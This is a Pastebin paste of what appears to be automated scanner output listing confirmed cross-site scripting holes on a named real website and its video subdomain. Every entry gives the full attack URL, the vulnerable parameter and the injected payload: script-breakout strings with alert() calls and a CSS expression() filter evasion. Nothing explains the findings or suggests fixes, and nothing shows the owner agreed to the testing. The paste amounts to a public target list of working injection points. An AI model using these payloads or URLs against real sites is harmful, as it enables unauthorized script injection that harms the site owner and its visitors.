Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ||| XSS (Cross-site Scripting) - http://okhelp.cz
- Severity: Important
- Confirmation: Confirmed
- URL: http://okhelp.cz/presny-cas/sms-zdarma.php/" stYle="x:expre/**/ssion(alert(9))
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: URI-BASED
- Parameter Type: RawUrlInjection
- Attack Pattern: /" stYle="x:expre/**/ssion(alert(9))
- Severity: Important
- Confirmation: Confirmed
- URL: http://okhelp.cz/presny-cas/povodne.php/" stYle="x:expre/**/ssion(alert(9))
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: URI-BASED
- Parameter Type: RawUrlInjection
- Attack Pattern: /" stYle="x:expre/**/ssion(alert(9))
- Severity: Important
- Confirmation: Confirmed
- URL: http://okhelp.cz/presny-cas/index.php/" stYle="x:expre/**/ssion(alert(9))
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: URI-BASED
- Parameter Type: RawUrlInjection
- Attack Pattern: /" stYle="x:expre/**/ssion(alert(9))
- Severity: Important
- Confirmation: Confirmed
- URL: http://okhelp.cz/presny-cas/jizdni-rady.php/" stYle="x:expre/**/ssion(alert(9))
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: URI-BASED
- Parameter Type: RawUrlInjection
- Attack Pattern: /" stYle="x:expre/**/ssion(alert(9))
- Severity: Important
- Confirmation: Confirmed
- URL: http://okhelp.cz/presny-cas/predpoved-pocasi.php/" stYle="x:expre/**/ssion(alert(9))
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: URI-BASED
- Parameter Type: RawUrlInjection
- Attack Pattern: /" stYle="x:expre/**/ssion(alert(9))
- Severity: Important
- Confirmation: Confirmed
- URL: http://okhelp.cz/presny-cas/tv-program.php/" stYle="x:expre/**/ssion(alert(9))
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: URI-BASED
- Parameter Type: RawUrlInjection
- Attack Pattern: /" stYle="x:expre/**/ssion(alert(9))
- Severity: Important
- Confirmation: Confirmed
- URL: http://okhelp.cz/presny-cas/stolety-kalendar.php/" stYle="x:expre/**/ssion(alert(9))
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: URI-BASED
- Parameter Type: RawUrlInjection
- Attack Pattern: /" stYle="x:expre/**/ssion(alert(9))
- Severity: Important
- Confirmation: Confirmed
- URL: http://okhelp.cz/presny-cas/benzin-nafta-lpg-ceny-phm.php/" stYle="x:expre/**/ssion(alert(9))
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: URI-BASED
- Parameter Type: RawUrlInjection
- Attack Pattern: /" stYle="x:expre/**/ssion(alert(9))
- Severity: Important
- Confirmation: Confirmed
- URL: http://okhelp.cz/presny-cas/kalendar.php/" stYle="x:expre/**/ssion(alert(9))
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: URI-BASED
- Parameter Type: RawUrlInjection
- Attack Pattern: /" stYle="x:expre/**/ssion(alert(9))
- Severity: Important
- Confirmation: Confirmed
- URL: http://okhelp.cz/presny-cas/vytvor-kalendar-pro-urcity-rok.php/" stYle="x:expre/**/ssion(alert(9))
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: URI-BASED
- Parameter Type: RawUrlInjection
- Attack Pattern: /" stYle="x:expre/**/ssion(alert(9))
- Severity: Important
- Confirmation: Confirmed
- URL: http://okhelp.cz/presny-cas/stolety-kalendar.php
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: den
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x000186)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://okhelp.cz/presny-cas/stolety-kalendar.php
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: mesic
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x00018F)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://okhelp.cz/presny-cas/vytvor-kalendar-pro-urcity-rok.php?rok='"--></style></script><script>alert(0x000196)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: rok
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x000196)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://okhelp.cz/presny-cas/stolety-kalendar.php
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: rok
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x0001C3)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://okhelp.cz/presny-cas/vytvor-kalendar-pro-urcity-rok.php
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: rok
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x0001CA)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://okhelp.cz/presny-cas/vytvor-kalendar-pro-urcity-rok.php?rok=2012
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: rok
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x000203)</script>
- ||| XSS (Cross-site Scripting) - http://video.okhelp.cz
- Severity: Important
- Confirmation: Confirmed
- URL: http://video.okhelp.cz/index.php?db='"--></style></script><script>alert(0x000004)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: db
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x000004)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://video.okhelp.cz/index.php?db='"--></style></script><script>alert(0x000064)</script>&post=katy-perry_firework
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: db
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x000064)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://video.okhelp.cz/index.php?db=best_of_hits_2010&post='"--></style></script><script>alert(0x000085)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: post
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x000085)</script>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement